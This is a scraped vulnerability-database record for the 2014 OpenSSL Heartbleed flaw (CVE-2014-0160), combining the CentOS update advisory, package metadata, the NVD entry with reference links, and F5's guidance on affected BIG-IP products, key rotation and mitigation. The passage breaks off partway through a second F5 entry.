ID CESA-2014:0376 Type centos Reporter CentOS Project Modified 2014-04-08T02:54:58
Description
CentOS Errata and Security Advisory CESA-2014:0376
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols, as well as a
full-strength, general purpose cryptography library.
An information disclosure flaw was found in the way OpenSSL handled TLS and
DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server
could send a specially crafted TLS or DTLS Heartbeat packet to disclose a
limited portion of memory per request from a connected client or server.
Note that the disclosed portions of memory could potentially include
sensitive information such as private keys. (CVE-2014-0160)
Red Hat would like to thank the OpenSSL project for reporting this issue.
Upstream acknowledges Neel Mehta of Google Security as the original
reporter.
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. For the update to take
effect, all services linked to the OpenSSL library (such as httpd and other
SSL-enabled services) must be restarted or the system rebooted.
Merged security bulletin from advisories:
http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html
{"bulletinFamily": "unix", "affectedPackage": [{"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-static", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-perl", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-static", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.src.rpm", "packageName": "openssl", "operator": "lt", "arch": "any", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "operator": "lt", "arch": "i686", "OSVersion": "6"}], "viewCount": 7, "reporter": "CentOS Project", "references": ["https://rhn.redhat.com/errata/RHSA-2014-0376.html"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "hashmap": [{"key": "affectedPackage", "hash": "4e51fcfdd32842a95fca825d4f1f9e1d"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "558f8e06acb9904c2df3eef5d5dc7dd3"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "description", "hash": "a1f95a5b4d320c7688d72d1e7751dab8"}, {"key": "href", "hash": "b93858a1cc8873a0b16d89b7745c19d0"}, {"key": "modified", "hash": "d8c32efc2ba146902379c7b9a34ae6d0"}, {"key": "published", "hash": "d8c32efc2ba146902379c7b9a34ae6d0"}, {"key": "references", "hash": "902ce01b069f7512f5d7313ca229e048"}, {"key": "reporter", "hash": "9855627921475e40e00f92d60af14cb3"}, {"key": "title", "hash": "99ece7d8bdc1c348de2af4c3efd96ebc"}, {"key": "type", "hash": "cdc872db616ac66adb3166c75e9ad183"}], "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html", "modified": "2014-04-08T02:54:58", "objectVersion": "1.3", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "id": "CESA-2014:0376", "title": "openssl security update", "hash": "296a9c5d1b6e5c33b459ca011159ad33c580c16b0fca5caa1fbe42bbd7d33d00", "edition": 1, "published": "2014-04-08T02:54:58", "type": "centos", "history": [], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "cvelist": ["CVE-2014-0160"], "lastseen": "2017-10-03T18:24:38"}
{"cve": [{"lastseen": "2018-10-24T11:11:21", "references": ["http://marc.info/?l=bugtraq&m=139757726426985&w=2", "http://www.exploit-db.com/exploits/32745", "http://www.securitytracker.com/id/1030079", "http://marc.info/?l=bugtraq&m=139758572430452&w=2", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html", "http://marc.info/?l=bugtraq&m=140015787404650&w=2", "http://marc.info/?l=bugtraq&m=139824993005633&w=2", "http://www.kerio.com/support/kerio-control/release-history", "http://www.securitytracker.com/id/1030082", "http://marc.info/?l=bugtraq&m=139817685517037&w=2", "http://www.kb.cert.org/vuls/id/720951", "http://marc.info/?l=bugtraq&m=139765756720506&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001843", "http://cogentdatahub.com/ReleaseNotes.html", "http://seclists.org/fulldisclosure/2014/Apr/190", "http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/", "http://marc.info/?l=bugtraq&m=139835815211508&w=2", "http://seclists.org/fulldisclosure/2014/Apr/109", "http://www.exploit-db.com/exploits/32764", "http://marc.info/?l=bugtraq&m=139905243827825&w=2", "http://www.ubuntu.com/usn/USN-2165-1", "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html", "http://support.citrix.com/article/CTX140605", "http://www.securityfocus.com/archive/1/534161/100/0/threaded", "http://marc.info/?l=bugtraq&m=139817727317190&w=2", "http://marc.info/?l=bugtraq&m=139889113431619&w=2", "http://seclists.org/fulldisclosure/2014/Dec/23", "http://marc.info/?l=bugtraq&m=139905405728262&w=2", "https://filezilla-project.org/versions.php?type=server", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "http://marc.info/?l=bugtraq&m=139774703817488&w=2", "http://marc.info/?l=bugtraq&m=139889295732144&w=2", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "http://rhn.redhat.com/errata/RHSA-2014-0378.html", "http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/", "http://marc.info/?l=bugtraq&m=139842151128341&w=2", "http://marc.info/?l=bugtraq&m=139774054614965&w=2", "http://marc.info/?l=bugtraq&m=139905295427946&w=2", "https://gist.github.com/chapmajs/10473815", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html", "http://marc.info/?l=bugtraq&m=142660345230545&w=2", "http://www.blackberry.com/btsc/KB35882", "http://marc.info/?l=bugtraq&m=139833395230364&w=2", "http://seclists.org/fulldisclosure/2014/Apr/173", "http://marc.info/?l=bugtraq&m=139836085512508&w=2", "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed", "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0", "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html", "http://secunia.com/advisories/59347", "https://blog.torproject.org/blog/openssl-bug-cve-2014-0160", "https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken", "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008", "http://marc.info/?l=bugtraq&m=139905458328378&w=2", "http://marc.info/?l=bugtraq&m=139905202427693&w=2", "http://marc.info/?l=bugtraq&m=140752315422991&w=2", "https://code.google.com/p/mod-spdy/issues/detail?id=85", "http://www.vmware.com/security/advisories/VMSA-2014-0012.html", "http://marc.info/?l=bugtraq&m=139869891830365&w=2", "http://www.debian.org/security/2014/dsa-2896", "http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661", "http://www.securitytracker.com/id/1030026", "http://rhn.redhat.com/errata/RHSA-2014-0396.html", "http://www.securityfocus.com/bid/66690", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217", "http://marc.info/?l=bugtraq&m=139824923705461&w=2", "http://www.securitytracker.com/id/1030078", "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", "http://heartbleed.com/", "http://marc.info/?l=bugtraq&m=139722163017074&w=2", "http://marc.info/?l=bugtraq&m=140724451518351&w=2", "http://www-01.ibm.com/support/docview.wss?uid=swg21670161", "http://marc.info/?l=bugtraq&m=141287864628122&w=2", "http://www.openssl.org/news/secadv_20140407.txt", "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.html", "http://www.securitytracker.com/id/1030081", "http://marc.info/?l=bugtraq&m=139817782017443&w=2", "http://seclists.org/fulldisclosure/2014/Apr/91", "http://marc.info/?l=bugtraq&m=139843768401936&w=2", "http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html", "http://www.securitytracker.com/id/1030077", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html", "http://seclists.org/fulldisclosure/2014/Apr/90", "http://secunia.com/advisories/59139", "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-119-01", "http://www.us-cert.gov/ncas/alerts/TA14-098A", "http://advisories.mageia.org/MGASA-2014-0165.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1084875", "http://www.f-secure.com/en/web/labs_global/fsc-2014-1", "http://www.securitytracker.com/id/1030074", "http://secunia.com/advisories/59243", "http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=96db9023b881d7cd9f379b0c154650d6c108e9a3", "http://www.securitytracker.com/id/1030080", "http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/", "http://rhn.redhat.com/errata/RHSA-2014-0376.html", "http://marc.info/?l=bugtraq&m=139905351928096&w=2", "http://rhn.redhat.com/errata/RHSA-2014-0377.html", "http://marc.info/?l=bugtraq&m=139757819327350&w=2", "http://marc.info/?l=bugtraq&m=139835844111589&w=2", "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00", "http://marc.info/?l=bugtraq&m=139757919027752&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001841", "http://marc.info/?l=bugtraq&m=139869720529462&w=2", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/", "http://marc.info/?l=bugtraq&m=140075368411126&w=2", "http://marc.info/?l=bugtraq&m=139905868529690&w=2", "http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf", "http://marc.info/?l=bugtraq&m=139905653828999&w=2", "http://www.splunk.com/view/SP-CAAAMB3", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3", "https://www.cert.fi/en/reports/2014/vulnerability788210.html", "http://marc.info/?l=bugtraq&m=139808058921905&w=2"], "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.", "edition": 6, "reporter": "NVD", "published": "2014-04-07T18:55:03", "title": "CVE-2014-0160", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-0160"], "scanner": [], "modified": "2018-10-23T17:29:00", "cpe": ["cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:1.0.1:beta2", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:1.0.2:beta1", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/a:openssl:openssl:1.0.1:beta3", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.1:beta1", "cpe:/a:openssl:openssl:1.0.1f"], "id": "CVE-2014-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "f5": [{"lastseen": "2018-11-28T01:11:47", "references": [], "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "edition": 1, "reporter": "f5", "published": "2014-04-09T05:45:00", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "enchantments": {"score": {"modified": "2018-11-28T01:11:47", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2018-11-27T23:16:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:23", "references": ["https://support.f5.com/kb/en-us/solutions/public/13000/700/sol13757.html", "https://support.f5.com/kb/en-us/solutions/public/12000/400/sol12463.html", "https://support.f5.com/kb/en-us/solutions/public/10000/300/sol10322.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.comhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.comhttp://heartbleed.com/", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123", "https://support.f5.comhttp://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/14000/700/sol14783.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: 